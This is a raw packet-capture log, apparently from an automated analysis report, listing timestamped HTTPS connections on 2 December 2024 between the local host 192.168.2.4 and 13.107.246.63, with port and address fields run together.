                                                          Dec 2, 2024 17:56:58.863069057 CET49892443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:58.863199949 CET49892443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:58.863217115 CET4434989213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:59.537739992 CET4434988913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:59.538832903 CET49889443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:59.538852930 CET4434988913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:59.540190935 CET49889443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:59.540196896 CET4434988913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:59.582716942 CET4434988613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:59.583209038 CET49886443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:59.583239079 CET4434988613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:59.584721088 CET49886443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:59.584729910 CET4434988613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:59.590847015 CET4434989013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:59.591269016 CET49890443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:59.591300964 CET4434989013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:59.592381001 CET49890443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:59.592386007 CET4434989013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:59.973251104 CET4434988913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:59.976504087 CET4434988913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:59.976588011 CET49889443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:59.976650000 CET49889443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:59.976667881 CET4434988913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:59.976680040 CET49889443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:59.976686954 CET4434988913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:59.979523897 CET49893443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:59.979568958 CET4434989313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:59.979634047 CET49893443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:59.979763985 CET49893443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:59.979778051 CET4434989313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:00.036163092 CET4434989013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:00.036334038 CET4434989013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:00.036561012 CET49890443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:00.037127972 CET49890443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:00.037149906 CET4434989013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:00.037173986 CET49890443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:00.037179947 CET4434989013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:00.037453890 CET4434988613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:00.037513971 CET4434988613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:00.037599087 CET49886443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:00.037890911 CET49886443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:00.037918091 CET4434988613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:00.037945986 CET49886443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:00.037952900 CET4434988613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:00.041481972 CET49894443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:00.041521072 CET4434989413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:00.041591883 CET49894443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:00.041718006 CET49894443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:00.041733980 CET4434989413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:00.041860104 CET49895443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:00.041874886 CET4434989513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:00.041929960 CET49895443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:00.042011976 CET49895443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:00.042023897 CET4434989513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:00.200301886 CET4434989113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:00.201049089 CET49891443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:00.201069117 CET4434989113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:00.202270985 CET49891443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:00.202275991 CET4434989113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:00.648442984 CET4434989113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:00.651262045 CET4434989113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:00.651343107 CET49891443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:00.652945995 CET4434989213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:00.660721064 CET49891443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:00.660742044 CET4434989113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:00.660751104 CET49891443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:00.660758972 CET4434989113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:00.661214113 CET49892443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:00.661238909 CET4434989213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:00.661825895 CET49892443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:00.661835909 CET4434989213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:00.664913893 CET49896443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:00.664962053 CET4434989613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:00.665020943 CET49896443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:00.665148020 CET49896443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:00.665163040 CET4434989613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:01.103180885 CET4434989213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:01.106247902 CET4434989213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:01.106297970 CET4434989213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:01.106321096 CET49892443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:01.106360912 CET49892443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:01.106410027 CET49892443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:01.106440067 CET4434989213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:01.106462002 CET49892443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:01.106468916 CET4434989213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:01.111854076 CET49897443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:01.111901045 CET4434989713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:01.111985922 CET49897443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:01.112148046 CET49897443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:01.112163067 CET4434989713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:01.698743105 CET4434989313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:01.707020998 CET49893443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:01.707047939 CET4434989313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:01.707489967 CET49893443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:01.707494020 CET4434989313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:01.824440956 CET4434989513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:01.825325966 CET49895443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:01.825351954 CET4434989513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:01.826596022 CET49895443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:01.826601982 CET4434989513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:01.888947964 CET4434989413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:01.889754057 CET49894443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:01.889786959 CET4434989413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:01.891021013 CET49894443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:01.891026974 CET4434989413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:02.151586056 CET4434989313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:02.151648045 CET4434989313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:02.151717901 CET49893443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:02.151951075 CET49893443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:02.151966095 CET4434989313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:02.151976109 CET49893443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:02.151982069 CET4434989313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:02.158443928 CET49898443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:02.158484936 CET4434989813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:02.158668041 CET49898443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:02.159033060 CET49898443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:02.159048080 CET4434989813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:02.273067951 CET4434989513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:02.273128986 CET4434989513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:02.273369074 CET49895443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:02.273669004 CET49895443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:02.273679018 CET4434989513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:02.273714066 CET49895443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:02.273719072 CET4434989513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:02.279733896 CET49899443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:02.279776096 CET4434989913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:02.279890060 CET49899443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:02.280102015 CET49899443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:02.280117035 CET4434989913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:02.384165049 CET4434989413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:02.387286901 CET4434989413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:02.387573957 CET49894443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:02.387573957 CET49894443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:02.387573957 CET49894443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:02.390448093 CET49900443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:02.390489101 CET4434990013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:02.390621901 CET49900443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:02.390949011 CET49900443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:02.390963078 CET4434990013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:02.396291018 CET4434989613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:02.396614075 CET49896443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:02.396626949 CET4434989613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:02.397036076 CET49896443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:02.397041082 CET4434989613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:02.692764044 CET49894443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:02.692802906 CET4434989413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:02.833926916 CET4434989613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:02.836874962 CET4434989613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:02.836937904 CET4434989613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:02.836981058 CET49896443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:02.837106943 CET49896443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:02.837282896 CET49896443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:02.837301016 CET4434989613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:02.843560934 CET49901443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:02.843604088 CET4434990113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:02.843729019 CET49901443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:02.844162941 CET49901443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:02.844173908 CET4434990113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:02.901084900 CET4434989713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:02.901782036 CET49897443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:02.901813030 CET4434989713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:02.903112888 CET49897443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:02.903117895 CET4434989713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:03.347649097 CET4434989713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:03.347721100 CET4434989713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:03.347876072 CET49897443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:03.348040104 CET49897443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:03.348061085 CET4434989713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:03.348076105 CET49897443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:03.348082066 CET4434989713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:03.353069067 CET49902443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:03.353116989 CET4434990213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:03.353195906 CET49902443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:03.353375912 CET49902443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:03.353389978 CET4434990213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:03.955549955 CET4434989813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:03.956496000 CET49898443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:03.956516027 CET4434989813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:03.957735062 CET49898443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:03.957741976 CET4434989813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:03.997225046 CET4434989913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:03.997875929 CET49899443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:03.997912884 CET4434989913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:03.999174118 CET49899443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:03.999181986 CET4434989913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:04.108308077 CET4434990013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:04.108886957 CET49900443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:04.108916998 CET4434990013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:04.109345913 CET49900443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:04.109358072 CET4434990013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:04.399842978 CET4434989813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:04.402892113 CET4434989813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:04.402960062 CET49898443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:04.402988911 CET4434989813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:04.403085947 CET49898443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:04.403091908 CET4434989813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:04.403101921 CET49898443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:04.403455973 CET4434989813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:04.407708883 CET49903443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:04.407753944 CET4434990313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:04.407844067 CET49903443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:04.408015013 CET49903443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:04.408029079 CET4434990313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:04.433358908 CET4434989913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:04.433484077 CET4434989913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:04.433552027 CET49899443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:04.433624983 CET49899443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:04.433624983 CET49899443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:04.433646917 CET4434989913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:04.433667898 CET4434989913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:04.435496092 CET49904443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:04.435523987 CET4434990413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:04.435595989 CET49904443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:04.435703039 CET49904443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:04.435718060 CET4434990413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:04.626197100 CET4434990113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:04.627327919 CET49901443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:04.627357006 CET4434990113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:04.628632069 CET49901443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:04.628643990 CET4434990113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:04.726471901 CET4434990013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:04.729049921 CET4434990013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:04.729087114 CET4434990013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:04.729161978 CET49900443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:04.729298115 CET49900443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:04.729427099 CET49900443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:04.729443073 CET4434990013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:04.729485989 CET49900443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:04.729491949 CET4434990013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:04.735766888 CET49905443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:04.735804081 CET4434990513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:04.735938072 CET49905443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:04.736363888 CET49905443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:04.736377001 CET4434990513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:05.160248041 CET4434990113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:05.165314913 CET4434990113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:05.165525913 CET49901443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:05.165674925 CET49901443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:05.165694952 CET4434990113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:05.170865059 CET49906443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:05.170897007 CET4434990613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:05.171008110 CET49906443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:05.171448946 CET49906443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:05.171463966 CET4434990613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:05.180124044 CET4434990213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:05.180973053 CET49902443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:05.180998087 CET4434990213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:05.182261944 CET49902443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:05.182267904 CET4434990213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:05.660814047 CET4434990213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:05.663933992 CET4434990213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:05.663983107 CET4434990213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:05.663992882 CET49902443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:05.664037943 CET49902443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:05.664088011 CET49902443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:05.664103031 CET4434990213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:05.664115906 CET49902443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:05.664120913 CET4434990213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:05.667828083 CET49907443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:05.667865038 CET4434990713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:05.667934895 CET49907443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:05.668062925 CET49907443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:05.668080091 CET4434990713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:06.156230927 CET4434990313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:06.157624006 CET49903443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:06.157661915 CET4434990313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:06.161901951 CET49903443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:06.161907911 CET4434990313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:06.263685942 CET4434990413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:06.264384985 CET49904443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:06.264415026 CET4434990413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:06.265702009 CET49904443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:06.265711069 CET4434990413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:06.476903915 CET4434990513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:06.477658033 CET49905443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:06.477685928 CET4434990513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:06.478943110 CET49905443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:06.478948116 CET4434990513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:06.591892004 CET4434990313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:06.594950914 CET4434990313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:06.595026970 CET49903443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:06.595071077 CET49903443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:06.595088959 CET4434990313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:06.595123053 CET49903443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:06.595129013 CET4434990313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:06.599013090 CET49908443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:06.599042892 CET4434990813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:06.599107027 CET49908443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:06.599231005 CET49908443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:06.599242926 CET4434990813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:06.708844900 CET4434990413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:06.712403059 CET4434990413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:06.712450981 CET4434990413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:06.712485075 CET49904443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:06.712524891 CET49904443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:06.712568045 CET49904443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:06.712583065 CET4434990413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:06.712620020 CET49904443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:06.712630987 CET4434990413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:06.716372013 CET49909443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:06.716415882 CET4434990913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:06.716487885 CET49909443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:06.716619968 CET49909443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:06.716633081 CET4434990913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:06.894681931 CET4434990613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:06.895627975 CET49906443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:06.895654917 CET4434990613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:06.896970034 CET49906443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:06.896975040 CET4434990613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:06.915163994 CET4434990513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:06.917862892 CET4434990513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:06.917952061 CET49905443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:06.917998075 CET49905443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:06.917998075 CET49905443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:06.918019056 CET4434990513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:06.918030024 CET4434990513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:06.923191071 CET49910443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:06.923240900 CET4434991013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:06.923351049 CET49910443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:06.923491955 CET49910443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:06.923506021 CET4434991013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:07.330559015 CET4434990613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:07.333795071 CET4434990613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:07.333873987 CET49906443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:07.333945990 CET49906443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:07.333961964 CET4434990613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:07.333971977 CET49906443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:07.333977938 CET4434990613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:07.337883949 CET49911443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:07.337924004 CET4434991113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:07.338001966 CET49911443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:07.338165998 CET49911443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:07.338181019 CET4434991113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:07.452779055 CET4434990713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:07.453864098 CET49907443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:07.453893900 CET4434990713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:07.455231905 CET49907443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:07.455238104 CET4434990713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:07.900156021 CET4434990713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:07.902729988 CET4434990713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:07.902821064 CET49907443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:07.915242910 CET49907443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:07.915244102 CET49907443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:07.915263891 CET4434990713.107.246.63192.168.2.4
